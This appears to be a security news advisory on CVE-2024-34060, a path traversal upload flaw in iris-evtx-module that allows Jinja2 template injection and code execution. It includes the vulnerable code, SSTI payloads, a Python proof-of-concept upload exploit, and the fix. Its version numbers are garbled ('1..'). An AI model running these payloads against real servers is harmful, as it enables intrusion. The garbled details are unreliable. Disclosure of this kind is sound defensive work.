CVE CyberSecurity Database News

CVE-2024-34060 - Arbitrary File Write and Remote Code Execution in IrisEVTXModule Before 1..

Poster -

Published: June 2024
Severity: High
Components Affected: iris-evtx-module (used by iris-web web application)

Quick Summary

A critical security flaw existed in all versions of IrisEVTXModule before 1... This vulnerability lets attackers write files anywhere on the system by uploading a specially named .evtx log file. Worse, if the remote server runs vulnerable software and allows Server Side Template Injection (SSTI), attackers can achieve remote code execution (RCE).

Background

IrisEVTXModule is a plugin for the IRIS web app and the evtx2splunk framework, letting users analyze Microsoft Windows event log (.evtx) files within browsers. Users upload .evtx files, which are then processed and ingested.

It’s meant to help blue teams and SOC analysts review logs. But until the v1.. patch, the module didn’t properly sanitize uploaded filenames, creating a dangerous security gap.

Core Problem

The vulnerable code saves uploaded files using user-supplied filenames, without cleaning or restricting them. This means filenames like ../../app/templates/exploit.html (a relative path attack) are accepted.

Result: An attacker can upload a file containing malicious template code. If the server later processes this file as a web template, code execution is possible.

Here’s a simplified view of the risky logic, based on open source inspection

# inside iris-evtx-module before v1..

def handle_upload(uploaded_file):
    # Directly trusts filename from the client (dangerous!)
    save_path = os.path.join(app.config['UPLOAD_FOLDER'], uploaded_file.filename)
    uploaded_file.save(save_path)

There’s no check here to filter out ../ or suspicious special filenames.

Step 1: Upload a Malicious EVTX File

- The attacker uploads a file with filename ../../iris/templates/shell.html

- The file’s content contains Jinja2 template code, for example

{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}


Step 2: Trigger SSTI (Server Side Template Injection)
- The application is tricked into loading and rendering this injected file (say, by visiting a crafted route or page).
- The included template code is executed with the privileges of the server, allowing arbitrary command execution.

---

#### Real-World Exploit PoC (Proof of Concept)

Here's a demonstrative Python snippet for the file upload exploit:

python
import requests

Replace with the actual target URL

target_url = "https://vulnerable-iris-app/upload"

payload_filename = "../../iris/templates/bad.html"
payload_content = b"{{ config.__class__.__init__.__globals__['os'].popen('touch /tmp/pwned').read() }}"

files = {'file': (payload_filename, payload_content, 'application/octet-stream')}

r = requests.post(target_url, files=files)
print("Upload Response:", r.status_code)

The attacker then triggers rendering of 'bad.html' to execute OS commands.


---

## References

- GitHub Advisory
- PyPI Security Advisory
- CVE Record

---

## What Was Fixed in v1..

The maintainer added checks to:
- Filter filenames and ensure they’re safe (no ../ traversal)
- Save uploaded files only under allowed directories
- Possibly randomize or sanitize output filenames

Example of Safe Handling:

python
import werkzeug.utils

filename = werkzeug.utils.secure_filename(uploaded_file.filename)
# Ensures 'bad/../evil.evtx' becomes 'evil.evtx'
save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
uploaded_file.save(save_path)
<br><br>---<br><br>## How to Stay Safe<br><br>- <b>Upgrade Now</b>: If you run iris-web or use iris-evtx-module, upgrade to 1.. or later.<br>- <b>Review your audit logs</b> for evidence of suspicious uploads.<br>- <b>Run the app as minimally privileged users</b> to reduce possible damage from RCE.<br>- <b>Web server hardening:</b> Disable SSTI where possible and limit file processing flows.<br><br>---<br><br>## Conclusion<br><br>CVE-2024-34060 is a textbook example of why filename handling must never be trusted user input. If you run any affected version, you must patch <b>immediately</b>. Attackers who can upload .evtx` files to your server may gain full remote shell access.

Stay safe, keep your systems updated!

---

Author:
CyberSecResearch.ai – June 2024

*This article is original content based on public advisories and testing. For official details, always refer to the vendor’s updates and advisories.*

Timeline

Published on: 05/23/2024 12:15:10 UTC
Last modified on: 06/04/2024 17:42:11 UTC